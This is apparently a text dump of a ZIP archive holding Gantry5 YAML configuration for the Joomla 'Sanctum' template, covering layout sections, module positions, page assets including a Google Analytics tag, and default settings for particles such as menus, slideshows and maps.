  extension: Extension
  additional: Additional
  prebottom: Prebottom
  bottom: Bottom
  afterbottom: Afterbottom
  last: Last
  copyright: Copyright
  to-top: To-top
  header: Header
  footer: Footer
  offcanvas: Offcanvas
particles:
  position:
    position-position-7623: Drawer
    position-position-9087: Top-a
    position-position-8851: Top-b
    position-position-3449: Top-c
    position-position-5681: Top-d
    position-position-4264: Header-a
    position-position-8596: Header-b
    position-position-3656: Breadcrumb-a
    position-position-1812: Breadcrumb-b
    position-position-7715: Breadcrumb-c
    position-position-1553: Breadcrumb-d
    position-position-2749: Fullwidth
    position-position-9137: Showcase-a
    position-position-9351: Showcase-b
    position-position-5672: Showcase-c
    position-position-8373: Showcase-d
    position-position-6411: Intro-a
    position-position-1356: Intro-b
    position-position-4570: Intro-c
    position-position-6625: Intro-d
    position-position-5749: Feature-a
    position-position-1421: Feature-b
    position-position-9645: Feature-c
    position-position-6942: Feature-d
    position-position-1038: Subfeature-a
    position-position-6295: Subfeature-b
    position-position-8188: Subfeature-c
    position-position-1549: Subfeature-d
    position-position-5550: Utility-a
    position-position-5811: Utility-b
    position-position-9636: Utility-c
    position-position-4401: Utility-d
    position-position-8260: Maintop-a
    position-position-5317: Maintop-b
    position-position-7666: Maintop-c
    position-position-6261: Maintop-d
    position-position-1149: Sidebar-left
    position-position-8918: Content-top-a
    position-position-4726: Content-top-b
    position-position-9471: Content-bottom-a
    position-position-6475: Content-bottom-b
    position-position-8823: Mainbottom-a
    position-position-2148: Mainbottom-b
    position-position-5376: Mainbottom-c
    position-position-5235: Mainbottom-d
    position-position-2504: Extension-a
    position-position-8947: Extension-b
    position-position-1860: Extension-c
    position-position-7253: Extension-d
    position-position-9368: Additional-a
    position-position-1506: Additional-b
    position-position-4196: Additional-c
    position-position-9407: Additional-d
    position-position-6801: Prebottom-a
    position-position-2384: Prebottom-b
    position-position-9956: Prebottom-c
    position-position-2351: Prebottom-d
    position-position-7196: Bottom-a
    position-position-9592: Bottom-b
    position-position-5753: Bottom-c
    position-position-5456: Bottom-d
    position-position-4910: Afterbottom-a
    position-position-3419: Afterbottom-b
    position-position-1718: Afterbottom-c
    position-position-7824: Afterbottom-d
    position-position-3569: Last-a
    position-position-9637: Last-b
    position-position-2550: Last-c
    position-position-1435: Last-d
    position-position-9108: Footer-a
    position-position-8026: Footer-b
    position-position-7438: Footer-c
    position-position-7932: Footer-d
    position-position-9174: Copyright-a
    position-position-2815: Copyright-b
    position-position-3167: Copyright-c
    position-position-1679: Copyright-d
    position-position-7933: Offcanvas-a
    position-position-1131: Offcanvas-b
  logo:
    logo-8000: Logo
  menu:
    menu-3483: Menu
  messages:
    system-messages-3913: 'System Messages'
  content:
    system-content-7865: 'Page Content'
  totop:
    totop-1762: Totop
  mobile-menu:
    mobile-menu-4028: Mobile-menu
inherit:
  default:
    drawer: drawer
    top: top
    header: header
    navigation: navigation
    breadcrumb: breadcrumb
    fullwidth: fullwidth
    showcase: showcase
    intro: intro
    feature: feature
    subfeature: subfeature
    utility: utility
    maintop: maintop
    system-messages: system-messages
    sidebar: sidebar
    mainbody: mainbody
    mainbottom: mainbottom
    extension: extension
    additional: additional
    prebottom: prebottom
    bottom: bottom
    afterbottom: afterbottom
    last: last
    footer: footer
    copyright: copyright
    to-top: to-top
    offcanvas: offcanvas
    position-position-7623: position-drawer
    position-position-9087: position-top-a
    position-position-8851: position-top-b
    position-position-3449: position-top-c
    position-position-5681: position-top-d
    position-position-4264: position-navigation-c
    logo-8000: logo-6391
    position-position-8596: position-navigation-d
    menu-3483: menu-6643
    position-position-3656: position-breadcrumb-a
    position-position-1812: position-breadcrumb-b
    position-position-7715: position-breadcrumb-c
    position-position-1553: position-breadcrumb-d
    position-position-2749: position-fullwidth
    position-position-9137: position-showcase-a
    position-position-9351: position-showcase-b
    position-position-5672: position-showcase-c
    position-position-8373: position-showcase-d
    position-position-6411: position-intro-a
    position-position-1356: position-intro-b
    position-position-4570: position-intro-c
    position-position-6625: position-intro-d
    position-position-5749: position-feature-a
    position-position-1421: position-feature-b
    position-position-9645: position-feature-c
    position-position-6942: position-feature-d
    position-position-1038: position-subfeature-a
    position-position-6295: position-subfeature-b
    position-position-8188: position-subfeature-c
    position-position-1549: position-subfeature-d
    position-position-5550: position-utility-a
    position-position-5811: position-utility-b
    position-position-9636: position-utility-c
    position-position-4401: position-utility-d
    position-position-8260: position-maintop-a
    position-position-5317: position-maintop-b
    position-position-7666: position-maintop-c
    position-position-6261: position-maintop-d
    system-messages-3913: system-messages-4492
    position-position-1149: position-sidebar-left
    position-position-8918: position-content-top-a
    position-position-4726: position-content-top-b
    system-content-7865: system-content-1470
    position-position-9471: position-content-bottom-a
    position-position-6475: position-content-bottom-b
    position-position-8823: position-mainbottom-a
    position-position-2148: position-mainbottom-b
    position-position-5376: position-mainbottom-c
    position-position-5235: position-mainbottom-d
    position-position-2504: position-extension-a
    position-position-8947: position-extension-b
    position-position-1860: position-extension-c
    position-position-7253: position-extension-d
    position-position-9368: position-additional-a
    position-position-1506: position-additional-b
    position-position-4196: position-additional-c
    position-position-9407: position-additional-d
    position-position-6801: position-prebottom-a
    position-position-2384: position-prebottom-b
    position-position-9956: position-prebottom-c
    position-position-2351: position-prebottom-d
    position-position-7196: position-bottom-a
    position-position-9592: position-bottom-b
    position-position-5753: position-bottom-c
    position-position-5456: position-bottom-d
    position-position-4910: position-afterbottom-a
    position-position-3419: position-afterbottom-b
    position-position-1718: position-afterbottom-c
    position-position-7824: position-afterbottom-d
    position-position-3569: position-last-a
    position-position-9637: position-last-b
    position-position-2550: position-last-c
    position-position-1435: position-last-d
    position-position-9108: position-footer-a
    position-position-8026: position-footer-b
    position-position-7438: position-footer-c
    position-position-7932: position-footer-d
    position-position-9174: position-copyright-a
    position-position-2815: position-copyright-b
    position-position-3167: position-copyright-c
    position-position-1679: position-copyright-d
    totop-1762: totop-7314
    mobile-menu-4028: mobile-menu-8307
    position-position-7933: position-offcanvas-a
    position-position-1131: position-offcanvas-b
PK!�Q�9��0it_sanctum/custom/config/_error/page/assets.yamlnu&1i�javascript:
  -
    location: media/jui/js/jquery.min.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: jQuery
  -
    location: media/jui/js/jquery-noconflict.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: 'jQuery NoConflict'
  -
    location: media/jui/js/jquery-migrate.min.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: 'jQuery Migrate'
PK!1�	�+it_sanctum/custom/config/_error/styles.yamlnu&1i�preset: preset1
PK!Ax���-it_sanctum/custom/config/_offline/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/offline.png'
  name: _offline
  timestamp: 1473315426
layout:
  /header/:
    -
      - logo-3431
  /main/:
    -
      - system-messages-1507
    -
      - system-content-7923
  /footer/:
    -
      - position-footer
  /copyright/:
    -
      - 'position-copyright-a 25'
      - 'position-copyright-b 25'
      - 'position-copyright-c 25'
      - 'position-copyright-d 25'
  offcanvas: {  }
structure:
  header:
    attributes:
      boxed: ''
  main:
    attributes:
      boxed: ''
  footer:
    attributes:
      boxed: ''
  copyright:
    type: section
    attributes:
      boxed: ''
content:
  position-footer:
    attributes:
      key: footer
  position-copyright-a:
    attributes:
      key: copyright-a
  position-copyright-b:
    attributes:
      key: copyright-b
  position-copyright-c:
    attributes:
      key: copyright-c
  position-copyright-d:
    attributes:
      key: copyright-d
PK!�꧙��,it_sanctum/custom/config/_offline/index.yamlnu&1i�name: _offline
timestamp: 1589896906
version: 7
preset:
  image: 'gantry-admin://images/layouts/offline.png'
  name: _offline
  timestamp: 1473315426
positions:
  footer: Footer
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
sections:
  header: Header
  main: Main
  footer: Footer
  copyright: Copyright
  offcanvas: Offcanvas
particles:
  logo:
    logo-3431: Logo
  messages:
    system-messages-1507: 'System Messages'
  content:
    system-content-7923: 'Page Content'
  position:
    position-footer: Footer
    position-copyright-a: Copyright-a
    position-copyright-b: Copyright-b
    position-copyright-c: Copyright-c
    position-copyright-d: Copyright-d
inherit: {  }
PK!���$��/it_sanctum/custom/config/default/page/head.yamlnu&1i�meta: {  }
head_bottom: "<!-- Global site tag (gtag.js) - Google Analytics -->\n<script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-168561535-1\"></script>\n<script>\n  window.dataLayer = window.dataLayer || [];\n  function gtag(){dataLayer.push(arguments);}\n  gtag('js', new Date());\n\n  gtag('config', 'UA-168561535-1');\n</script>"
atoms:
  -
    id: uikit-2431
    type: uikit
    title: 'UIkit for Gantry5'
    attributes:
      enabled: '1'
      jslocation: footer
  -
    id: template-js-7167
    type: template-js
    title: Template.js
    attributes:
      enabled: '1'
  -
    id: scrollreveal-js-5954
    type: scrollreveal-js
    title: ScrollReveal.js
    attributes:
      enabled: '1'
      mobile: 'false'
  -
    id: icon-fonts-7502
    type: icon-fonts
    title: 'Icon Fonts'
    attributes:
      enabled: '1'
      load:
        octicons: '0'
        strokeicon7: '0'
        ionicons: '1'
        themify: '0'
        typicons: '0'
PK!�HC�ee/it_sanctum/custom/config/default/page/body.yamlnu&1i�attribs:
  id: ''
  class: gantry
  extra: {  }
layout:
  sections: '0'
body_top: ''
body_bottom: ''
PK!�51$551it_sanctum/custom/config/default/page/assets.yamlnu&1i�favicon: ''
touchicon: ''
css: {  }
javascript: {  }
PK!�s
��+it_sanctum/custom/config/default/index.yamlnu&1i�name: default
timestamp: 1589896902
version: 7
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
positions:
  drawer: Drawer
  top-a: Top-a
  top-b: Top-b
  top-c: Top-c
  top-d: Top-d
  header-a: Header-a
  header-b: Header-b
  breadcrumb-a: Breadcrumb-a
  breadcrumb-b: Breadcrumb-b
  breadcrumb-c: Breadcrumb-c
  breadcrumb-d: Breadcrumb-d
  fullwidth: Fullwidth
  showcase-a: Showcase-a
  showcase-b: Showcase-b
  showcase-c: Showcase-c
  showcase-d: Showcase-d
  intro-a: Intro-a
  intro-b: Intro-b
  intro-c: Intro-c
  intro-d: Intro-d
  feature-a: Feature-a
  feature-b: Feature-b
  feature-c: Feature-c
  feature-d: Feature-d
  subfeature-a: Subfeature-a
  subfeature-b: Subfeature-b
  subfeature-c: Subfeature-c
  subfeature-d: Subfeature-d
  utility-a: Utility-a
  utility-b: Utility-b
  utility-c: Utility-c
  utility-d: Utility-d
  maintop-a: Maintop-a
  maintop-b: Maintop-b
  maintop-c: Maintop-c
  maintop-d: Maintop-d
  sidebar-left: Sidebar-left
  content-top-a: Content-top-a
  content-top-b: Content-top-b
  content-bottom-a: Content-bottom-a
  content-bottom-b: Content-bottom-b
  sidebar-right: Sidebar-right
  mainbottom-a: Mainbottom-a
  mainbottom-b: Mainbottom-b
  mainbottom-c: Mainbottom-c
  mainbottom-d: Mainbottom-d
  extension-a: Extension-a
  extension-b: Extension-b
  extension-c: Extension-c
  extension-d: Extension-d
  additional-a: Additional-a
  additional-b: Additional-b
  additional-c: Additional-c
  additional-d: Additional-d
  prebottom-a: Prebottom-a
  prebottom-b: Prebottom-b
  prebottom-c: Prebottom-c
  prebottom-d: Prebottom-d
  bottom-a: Bottom-a
  bottom-b: Bottom-b
  bottom-c: Bottom-c
  bottom-d: Bottom-d
  afterbottom-a: Afterbottom-a
  afterbottom-b: Afterbottom-b
  afterbottom-c: Afterbottom-c
  afterbottom-d: Afterbottom-d
  last-a: Last-a
  last-b: Last-b
  last-c: Last-c
  last-d: Last-d
  footer-a: Footer-a
  footer-b: Footer-b
  footer-c: Footer-c
  footer-d: Footer-d
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
  offcanvas-a: Offcanvas-a
  offcanvas-b: Offcanvas-b
sections:
  drawer: Drawer
  top: Top
  navigation: Navigation
  breadcrumb: Breadcrumb
  fullwidth: Fullwidth
  showcase: Showcase
  intro: Intro
  feature: Feature
  subfeature: Subfeature
  utility: Utility
  maintop: Maintop
  system-messages: System-messages
  sidebar: Sidebar
  mainbody: Mainbody
  mainbottom: Mainbottom
  extension: Extension
  additional: Additional
  prebottom: Prebottom
  bottom: Bottom
  afterbottom: Afterbottom
  last: Last
  copyright: Copyright
  to-top: To-top
  header: Header
  aside: Aside
  footer: Footer
  offcanvas: Offcanvas
particles:
  position:
    position-drawer: Drawer
    position-top-a: Top-a
    position-top-b: Top-b
    position-top-c: Top-c
    position-top-d: Top-d
    position-navigation-c: Header-a
    position-navigation-d: Header-b
    position-breadcrumb-a: Breadcrumb-a
    position-breadcrumb-b: Breadcrumb-b
    position-breadcrumb-c: Breadcrumb-c
    position-breadcrumb-d: Breadcrumb-d
    position-fullwidth: Fullwidth
    position-showcase-a: Showcase-a
    position-showcase-b: Showcase-b
    position-showcase-c: Showcase-c
    position-showcase-d: Showcase-d
    position-intro-a: Intro-a
    position-intro-b: Intro-b
    position-intro-c: Intro-c
    position-intro-d: Intro-d
    position-feature-a: Feature-a
    position-feature-b: Feature-b
    position-feature-c: Feature-c
    position-feature-d: Feature-d
    position-subfeature-a: Subfeature-a
    position-subfeature-b: Subfeature-b
    position-subfeature-c: Subfeature-c
    position-subfeature-d: Subfeature-d
    position-utility-a: Utility-a
    position-utility-b: Utility-b
    position-utility-c: Utility-c
    position-utility-d: Utility-d
    position-maintop-a: Maintop-a
    position-maintop-b: Maintop-b
    position-maintop-c: Maintop-c
    position-maintop-d: Maintop-d
    position-sidebar-left: Sidebar-left
    position-content-top-a: Content-top-a
    position-content-top-b: Content-top-b
    position-content-bottom-a: Content-bottom-a
    position-content-bottom-b: Content-bottom-b
    position-sidebar-right: Sidebar-right
    position-mainbottom-a: Mainbottom-a
    position-mainbottom-b: Mainbottom-b
    position-mainbottom-c: Mainbottom-c
    position-mainbottom-d: Mainbottom-d
    position-extension-a: Extension-a
    position-extension-b: Extension-b
    position-extension-c: Extension-c
    position-extension-d: Extension-d
    position-additional-a: Additional-a
    position-additional-b: Additional-b
    position-additional-c: Additional-c
    position-additional-d: Additional-d
    position-prebottom-a: Prebottom-a
    position-prebottom-b: Prebottom-b
    position-prebottom-c: Prebottom-c
    position-prebottom-d: Prebottom-d
    position-bottom-a: Bottom-a
    position-bottom-b: Bottom-b
    position-bottom-c: Bottom-c
    position-bottom-d: Bottom-d
    position-afterbottom-a: Afterbottom-a
    position-afterbottom-b: Afterbottom-b
    position-afterbottom-c: Afterbottom-c
    position-afterbottom-d: Afterbottom-d
    position-last-a: Last-a
    position-last-b: Last-b
    position-last-c: Last-c
    position-last-d: Last-d
    position-footer-a: Footer-a
    position-footer-b: Footer-b
    position-footer-c: Footer-c
    position-footer-d: Footer-d
    position-copyright-a: Copyright-a
    position-copyright-b: Copyright-b
    position-copyright-c: Copyright-c
    position-copyright-d: Copyright-d
    position-offcanvas-a: Offcanvas-a
    position-offcanvas-b: Offcanvas-b
  logo:
    logo-6391: Logo
  menu:
    menu-6643: Menu
  messages:
    system-messages-4492: 'System Messages'
  content:
    system-content-1470: 'Page Content'
  totop:
    totop-7314: Totop
  mobile-menu:
    mobile-menu-8307: Mobile-menu
inherit: {  }
PK!~Qj��(�(,it_sanctum/custom/config/default/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
layout:
  /drawer/:
    -
      - position-drawer
  /top/:
    -
      - 'position-top-a 25'
      - 'position-top-b 25'
      - 'position-top-c 25'
      - 'position-top-d 25'
  /header/:
    -
      - 'position-navigation-c 33.3'
      - 'logo-6391 33.3'
      - 'position-navigation-d 33.3'
  /navigation/:
    -
      - menu-6643
  /breadcrumb/:
    -
      - 'position-breadcrumb-a 25'
      - 'position-breadcrumb-b 25'
      - 'position-breadcrumb-c 25'
      - 'position-breadcrumb-d 25'
  /fullwidth/:
    -
      - position-fullwidth
  /showcase/:
    -
      - 'position-showcase-a 25'
      - 'position-showcase-b 25'
      - 'position-showcase-c 25'
      - 'position-showcase-d 25'
  /intro/:
    -
      - 'position-intro-a 25'
      - 'position-intro-b 25'
      - 'position-intro-c 25'
      - 'position-intro-d 25'
  /feature/:
    -
      - 'position-feature-a 25'
      - 'position-feature-b 25'
      - 'position-feature-c 25'
      - 'position-feature-d 25'
  /subfeature/:
    -
      - 'position-subfeature-a 25'
      - 'position-subfeature-b 25'
      - 'position-subfeature-c 25'
      - 'position-subfeature-d 25'
  /utility/:
    -
      - 'position-utility-a 25'
      - 'position-utility-b 25'
      - 'position-utility-c 25'
      - 'position-utility-d 25'
  /maintop/:
    -
      - 'position-maintop-a 25'
      - 'position-maintop-b 25'
      - 'position-maintop-c 25'
      - 'position-maintop-d 25'
  /system-messages/:
    -
      - system-messages-4492
  /container-main/:
    -
      -
        'sidebar 30':
          -
            - position-sidebar-left
      -
        'mainbody 40':
          -
            - 'position-content-top-a 50'
            - 'position-content-top-b 50'
          -
            - system-content-1470
          -
            - 'position-content-bottom-a 50'
            - 'position-content-bottom-b 50'
      -
        'aside 30':
          -
            - position-sidebar-right
  /mainbottom/:
    -
      - 'position-mainbottom-a 25'
      - 'position-mainbottom-b 25'
      - 'position-mainbottom-c 25'
      - 'position-mainbottom-d 25'
  /extension/:
    -
      - 'position-extension-a 25'
      - 'position-extension-b 25'
      - 'position-extension-c 25'
      - 'position-extension-d 25'
  /additional/:
    -
      - 'position-additional-a 25'
      - 'position-additional-b 25'
      - 'position-additional-c 25'
      - 'position-additional-d 25'
  /prebottom/:
    -
      - 'position-prebottom-a 25'
      - 'position-prebottom-b 25'
      - 'position-prebottom-c 25'
      - 'position-prebottom-d 25'
  /bottom/:
    -
      - 'position-bottom-a 25'
      - 'position-bottom-b 25'
      - 'position-bottom-c 25'
      - 'position-bottom-d 25'
  /afterbottom/:
    -
      - 'position-afterbottom-a 25'
      - 'position-afterbottom-b 25'
      - 'position-afterbottom-c 25'
      - 'position-afterbottom-d 25'
  /last/:
    -
      - 'position-last-a 25'
      - 'position-last-b 25'
      - 'position-last-c 25'
      - 'position-last-d 25'
  /footer/:
    -
      - 'position-footer-a 25'
      - 'position-footer-b 25'
      - 'position-footer-c 45'
      - 'position-footer-d 5'
  /copyright/:
    -
      - 'position-copyright-a 25'
      - 'position-copyright-b 25'
      - 'position-copyright-c 25'
      - 'position-copyright-d 25'
  /to-top/:
    -
      - totop-7314
  offcanvas:
    -
      - mobile-menu-8307
    -
      - position-offcanvas-a
    -
      - position-offcanvas-b
structure:
  drawer:
    type: section
    attributes:
      boxed: ''
  top:
    type: section
    attributes:
      boxed: ''
  header:
    attributes:
      boxed: ''
      class: ''
  navigation:
    type: section
    attributes:
      boxed: ''
      class: ''
      extra:
        -
          data-uk-sticky: '{media: 768}'
  breadcrumb:
    type: section
    attributes:
      boxed: ''
  fullwidth:
    type: section
    attributes:
      boxed: ''
  showcase:
    type: section
    attributes:
      boxed: ''
  intro:
    type: section
    attributes:
      boxed: ''
  feature:
    type: section
    attributes:
      boxed: ''
  subfeature:
    type: section
    attributes:
      boxed: ''
  utility:
    type: section
    attributes:
      boxed: ''
  maintop:
    type: section
    attributes:
      boxed: ''
  system-messages:
    type: section
    attributes:
      boxed: ''
  sidebar:
    type: section
    attributes:
      class: ''
    block:
      fixed: '1'
  mainbody:
    type: section
  aside:
    attributes:
      class: ''
    block:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    attributes:
      boxed: ''
  extension:
    type: section
    attributes:
      boxed: ''
  additional:
    type: section
    attributes:
      boxed: ''
  prebottom:
    type: section
    attributes:
      boxed: ''
  bottom:
    type: section
    attributes:
      boxed: ''
  afterbottom:
    type: section
    attributes:
      boxed: ''
  last:
    type: section
    attributes:
      boxed: ''
  footer:
    attributes:
      boxed: ''
  copyright:
    type: section
    attributes:
      boxed: ''
  to-top:
    type: section
    attributes:
      boxed: ''
  offcanvas:
    attributes:
      position: g-offcanvas-left
      class: ''
      extra: {  }
      swipe: '0'
      css3animation: '1'
content:
  position-drawer:
    attributes:
      key: drawer
  position-top-a:
    attributes:
      key: top-a
  position-top-b:
    attributes:
      key: top-b
    block:
      class: hidden-phone
  position-top-c:
    attributes:
      key: top-c
  position-top-d:
    attributes:
      key: top-d
  position-navigation-c:
    title: Header-a
    attributes:
      key: header-a
  position-navigation-d:
    title: Header-b
    attributes:
      key: header-b
  menu-6643:
    attributes:
      mobileTarget: '1'
  position-breadcrumb-a:
    attributes:
      key: breadcrumb-a
  position-breadcrumb-b:
    attributes:
      key: breadcrumb-b
  position-breadcrumb-c:
    attributes:
      key: breadcrumb-c
  position-breadcrumb-d:
    attributes:
      key: breadcrumb-d
  position-fullwidth:
    attributes:
      key: fullwidth
  position-showcase-a:
    attributes:
      key: showcase-a
  position-showcase-b:
    attributes:
      key: showcase-b
  position-showcase-c:
    attributes:
      key: showcase-c
  position-showcase-d:
    attributes:
      key: showcase-d
  position-intro-a:
    attributes:
      key: intro-a
  position-intro-b:
    attributes:
      key: intro-b
  position-intro-c:
    attributes:
      key: intro-c
  position-intro-d:
    attributes:
      key: intro-d
  position-feature-a:
    attributes:
      key: feature-a
  position-feature-b:
    attributes:
      key: feature-b
  position-feature-c:
    attributes:
      key: feature-c
  position-feature-d:
    attributes:
      key: feature-d
  position-subfeature-a:
    attributes:
      key: subfeature-a
  position-subfeature-b:
    attributes:
      key: subfeature-b
  position-subfeature-c:
    attributes:
      key: subfeature-c
  position-subfeature-d:
    attributes:
      key: subfeature-d
  position-utility-a:
    attributes:
      key: utility-a
  position-utility-b:
    attributes:
      key: utility-b
  position-utility-c:
    attributes:
      key: utility-c
  position-utility-d:
    attributes:
      key: utility-d
  position-maintop-a:
    attributes:
      key: maintop-a
  position-maintop-b:
    attributes:
      key: maintop-b
  position-maintop-c:
    attributes:
      key: maintop-c
  position-maintop-d:
    attributes:
      key: maintop-d
  position-sidebar-left:
    attributes:
      key: sidebar-left
  position-content-top-a:
    attributes:
      key: content-top-a
  position-content-top-b:
    attributes:
      key: content-top-b
  position-content-bottom-a:
    attributes:
      key: content-bottom-a
  position-content-bottom-b:
    attributes:
      key: content-bottom-b
  position-sidebar-right:
    attributes:
      key: sidebar-right
  position-mainbottom-a:
    attributes:
      key: mainbottom-a
  position-mainbottom-b:
    attributes:
      key: mainbottom-b
  position-mainbottom-c:
    attributes:
      key: mainbottom-c
  position-mainbottom-d:
    attributes:
      key: mainbottom-d
  position-extension-a:
    attributes:
      key: extension-a
  position-extension-b:
    attributes:
      key: extension-b
  position-extension-c:
    attributes:
      key: extension-c
  position-extension-d:
    attributes:
      key: extension-d
  position-additional-a:
    attributes:
      key: additional-a
  position-additional-b:
    attributes:
      key: additional-b
  position-additional-c:
    attributes:
      key: additional-c
  position-additional-d:
    attributes:
      key: additional-d
  position-prebottom-a:
    attributes:
      key: prebottom-a
  position-prebottom-b:
    attributes:
      key: prebottom-b
  position-prebottom-c:
    attributes:
      key: prebottom-c
  position-prebottom-d:
    attributes:
      key: prebottom-d
  position-bottom-a:
    attributes:
      key: bottom-a
  position-bottom-b:
    attributes:
      key: bottom-b
  position-bottom-c:
    attributes:
      key: bottom-c
  position-bottom-d:
    attributes:
      key: bottom-d
  position-afterbottom-a:
    attributes:
      key: afterbottom-a
  position-afterbottom-b:
    attributes:
      key: afterbottom-b
  position-afterbottom-c:
    attributes:
      key: afterbottom-c
  position-afterbottom-d:
    attributes:
      key: afterbottom-d
  position-last-a:
    attributes:
      key: last-a
  position-last-b:
    attributes:
      key: last-b
  position-last-c:
    attributes:
      key: last-c
  position-last-d:
    attributes:
      key: last-d
  position-footer-a:
    attributes:
      key: footer-a
  position-footer-b:
    attributes:
      key: footer-b
  position-footer-c:
    attributes:
      key: footer-c
  position-footer-d:
    attributes:
      key: footer-d
  position-copyright-a:
    attributes:
      key: copyright-a
  position-copyright-b:
    attributes:
      key: copyright-b
  position-copyright-c:
    attributes:
      key: copyright-c
  position-copyright-d:
    attributes:
      key: copyright-d
  position-offcanvas-a:
    attributes:
      key: offcanvas-a
  position-offcanvas-b:
    attributes:
      key: offcanvas-b
PK!a�Z�

6it_sanctum/custom/config/default/particles/spacer.yamlnu&1i�enabled: '1'
PK!��8``6it_sanctum/custom/config/default/particles/social.yamlnu&1i�enabled: '1'
title: ''
target: _blank
tooltippos: auto
css:
  class: ''
extra: {  }
items: {  }
PK!�.�zz<it_sanctum/custom/config/default/particles/onepage-menu.yamlnu&1i�enabled: '1'
stickyoffset: '130'
smoothscrolloffset: '120'
boundary: '#g-footer'
css:
  class: ''
extra: {  }
items: {  }
PK!����MM:it_sanctum/custom/config/default/particles/page-title.yamlnu&1i�enabled: '1'
title: ''
description: ''
icon: ''
css:
  class: ''
extra: {  }
PK!�ѿ��8it_sanctum/custom/config/default/particles/our-team.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
navigation: arrows
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!:�c�;it_sanctum/custom/config/default/particles/content-pro.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
autoplayInterval: '7000'
navigation: arrows
animation: fade
duration: '200'
lightbox: enable
pullup: '0'
css:
  class: ''
extra: {  }
items: {  }
PK!\k�n��<it_sanctum/custom/config/default/particles/contentarray.yamlnu&1i�enabled: '1'
article:
  display:
    image:
      enabled: intro
    text:
      type: intro
      limit: ''
      formatting: text
      prepare: '0'
    title:
      enabled: show
      limit: ''
    date:
      enabled: published
      format: 'l, F d, Y'
    read_more:
      enabled: show
      label: ''
      css: ''
    author:
      enabled: show
    category:
      enabled: link
    hits:
      enabled: show
css:
  class: ''
extra: {  }
PK!�oF{

9it_sanctum/custom/config/default/particles/googlemap.yamlnu&1i�enabled: '1'
apikey: ''
width: 100%
height: 500px
maptype: ROADMAP
latitude: '52.052312'
longitude: '4.447141'
zoom: '7'
defaultmarker: show
markertext: ''
markerstate: '1'
scrollwheel: '0'
dragging: enabled
markers: {  }
snazzymaps: ''
css:
  class: ''
extra: {  }
PK!)Z��9it_sanctum/custom/config/default/particles/slideshow.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
height: auto
autoplay: 'true'
autoplayInterval: '7000'
navigation: arrows
animation: fade
animationDuration: '500'
kenburns: 'false'
pauseOnHover: 'true'
fullscreen: '0'
css:
  class: ''
extra: {  }
items: {  }
PK!]1�8aa>it_sanctum/custom/config/default/particles/image-features.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
columns: '2'
css:
  class: ''
extra: {  }
items: {  }
PK!��K�RR4it_sanctum/custom/config/default/particles/logo.yamlnu&1i�enabled: '1'
url: ''
image: 'gantry-media://logo.png'
text: Sanctum
class: g-logo
PK!a�Z�

;it_sanctum/custom/config/default/particles/mobile-menu.yamlnu&1i�enabled: '1'
PK!Z3Ѭ�=it_sanctum/custom/config/default/particles/paypal-donate.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
email: ''
itemname: ''
itemnumber: ''
currencycode: ''
buttontext: ''
buttonicon: ''
target: _blank
css:
  class: ''
extra: {  }
PK!�@�6it_sanctum/custom/config/default/particles/module.yamlnu&1i�enabled: '1'
chrome: ''
PK!��3ww9it_sanctum/custom/config/default/particles/accordion.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
collapse: 'true'
showfirst: 'true'
css:
  class: ''
extra: {  }
items: {  }
PK!��"�33Bit_sanctum/custom/config/default/particles/content-pro-joomla.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
autoplayInterval: '7000'
navigation: arrows
animation: fade
duration: '200'
lightbox: enable
pullup: '0'
css:
  class: ''
extra: {  }
article:
  filter:
    categories: ''
    articles: ''
    featured: include
  limit:
    total: '3'
    start: '0'
  sort:
    orderby: publish_up
    ordering: ASC
  display:
    image:
      enabled: intro
    title:
      enabled: show
      limit: ''
    date:
      enabled: published
      format: 'l, F d, Y'
    author:
      enabled: show
    category:
      enabled: link
    hits:
      enabled: show
    text:
      type: intro
      limit: ''
      formatting: text
    read_more:
      enabled: show
      label: ''
height: ''
articledetails: show
PK!c���``8it_sanctum/custom/config/default/particles/contacts.yamlnu&1i�enabled: '1'
style: style1
layout: vertical
equal: '0'
css:
  class: ''
extra: {  }
items: {  }
PK!X�!8qq9it_sanctum/custom/config/default/particles/media-box.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
tooltippos: top
columns: '1'
css:
  class: ''
extra: {  }
items: {  }
PK!a�Z�

8it_sanctum/custom/config/default/particles/messages.yamlnu&1i�enabled: '1'
PK!#U�OO5it_sanctum/custom/config/default/particles/totop.yamlnu&1i�enabled: '1'
style: style1
icon: ''
offset: ''
css:
  class: totop
content: ''
PK!O?k���4it_sanctum/custom/config/default/particles/tabs.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
layout: top
tabswidth: '2'
justify: 'no'
justifynumber: '1'
animation: none
css:
  class: ''
extra: {  }
items: {  }
PK!��_��4it_sanctum/custom/config/default/particles/menu.yamlnu&1i�enabled: '1'
menu: ''
base: /
startLevel: '1'
maxLevels: '3'
renderTitles: '0'
hoverExpand: '1'
mobileTarget: '0'
forceTarget: '0'
PK!��$<it_sanctum/custom/config/default/particles/modal-search.yamlnu&1i�enabled: '1'
style: style1
PK!_��559it_sanctum/custom/config/default/particles/copyright.yamlnu&1i�enabled: '1'
date:
  start: now
  end: now
owner: ''
PK!�ѿ��9it_sanctum/custom/config/default/particles/companies.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
